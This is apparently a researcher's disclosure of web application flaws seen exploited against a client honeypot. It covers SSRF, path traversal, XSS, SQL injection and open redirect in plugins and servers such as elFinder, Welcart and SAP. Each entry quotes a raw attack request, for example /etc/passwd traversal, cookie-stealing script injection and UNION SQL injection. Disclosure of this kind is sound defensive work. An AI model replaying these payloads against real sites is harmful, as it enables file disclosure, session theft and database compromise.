YOURLS-GA-MP-Tracking /GA-Measurement-Protocol/plugin.php HTTP_REFERER Header Handling SSRF

A honeypot at a client site caught this being exploited in the wild on 2022-08-09. The software, YOURLS-GA-MP-Tracking hasn’t been updated since 2016 and requests for a security contact are not answered. When it receives the HTTP referer it can use that to invoke a server-side request forgery flaw.

REDACTED - - [09/Aug/2022:19:01:32 -0400] "GET /GA-Measurement-Protocol/plugin.php HTTP/1.1" 404 737 "ATTACKER-SITE" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"

Caucho Resin /resin-doc/viewfile/ file Parameter Path Traversal Remote File Disclosure

A honeypot at a client site caught this being exploited in the wild on 2023-02-14. It’s similar to the vulnerability in the same software as CVE-2021-44138 but uses the file parameter.

REDACTED - - [14/Feb/2023:14:21:04 +0100] "GET /resin-doc/viewfile/?file=/WEB-INF/resin-web.xml HTTP/1.1" 404 17187 "-" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36"

Studio-42 elFinder /elfinder/php/connector.minimal.php target Parameter Path Traversal Remote File Disclosure

A honeypot at a client site caught this being exploited in the wild on 2023-02-14. It’s similar to the vulnerability in the same software and script as CVE-2021-43421 but instead of file upload allows file disclosure.

REDACTED - - [14/Feb/2023:13:22:01 +0400] "GET /elfinder/php/connector.minimal.php?cmd=file&target=l1_<@base64>/var/www/html/elfinder/files//..//..//..//..//..//../etc/passwd<@/base64>&download=1 HTTP/1.1" 404 17186 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36"

ActiveHelper LiveHelp Live Chat Plugin for WordPress Multiple Parameter XSS

A honeypot at a client site caught this being exploited in the wild on 2023-02-15. It’s basically the same type of vulnerability in the same software and script as CVE-2014-4513 but two different parameters (params: MESSAGE, EMAIL).

REDACTED - - [15/Feb/2023:06:22:06 +0100] "GET /wp-content/plugins/activehelper-livehelp/server/offline.php?MESSAGE=MESSAGE%3C%2Ftextarea%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&DOMAINID=DOMAINID&COMPLETE=COMPLETE&TITLE=TITLE&URL=URL&COMPANY=COMPANY&SERVER=SERVER&PHONE=PHONE&SECURITY=SECURITY&BCC=BCC&EMAIL=EMAIL%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&NAME=NAME%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/s

Welcart e-Commerce Plugin for WordPress /wp-content/plugins/usc-e-shop/functions/progress-check.php progressfile Path Traversal Remote File Disclosure

A honeypot at a client site caught this being exploited in the wild on 2023-02-15. It’s basically the same type of vulnerability in the same software and script as CVE-2022-4237. Instead this is a classic path traversal:

REDACTED - - [15/Feb/2023:06:22:05 +0100] "GET /wp-content/plugins/usc-e-shop/functions/progress-check.php?progressfile=../../../../../../../../../../../../../etc/passwd HTTP/1.1" 404 17187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36"

74cms ajax_officebuilding.php key Parameter SQL Injection

A honeypot at a client site caught this being exploited in the wild on 2023-02-13. This is the same endpoint seen in this bug report. That report was for the “x” parameter, this request is exploiting the “key” parameter instead.

REDACTED - [13/Feb/2023:09:36:04 +0100] "GET /plus/ajax_officebuilding.php?act=key&key=\xe9\x8c\xa6%27%20a<>nd%201=2%20un<>ion%20sel<>ect%201,2,3,md5(999999999),5,6,7,8,9%23 HTTP/1.1" 404 17187 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36"

SAP Web Application Server /sap/bc/BSp/sap/menu/fameset.htm sapexiturl Open Redirect Weakness

A honeypot at a client site caught this being exploited in the wild on 2023-06-23. This is the same endpoint seen in this Exploit-DB advisory for a reflected XSS vulnerability, but a different parameter.

REDACTED - - [23/Jun/2023:22:12:03 -0600] "GET /sap/bc/BSp/sap/menu/fameset.htm?sap--essioncmd=close&sapexiturl=https%3a%2f%2finteract.sh HTTP/1.1" 404 734 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36"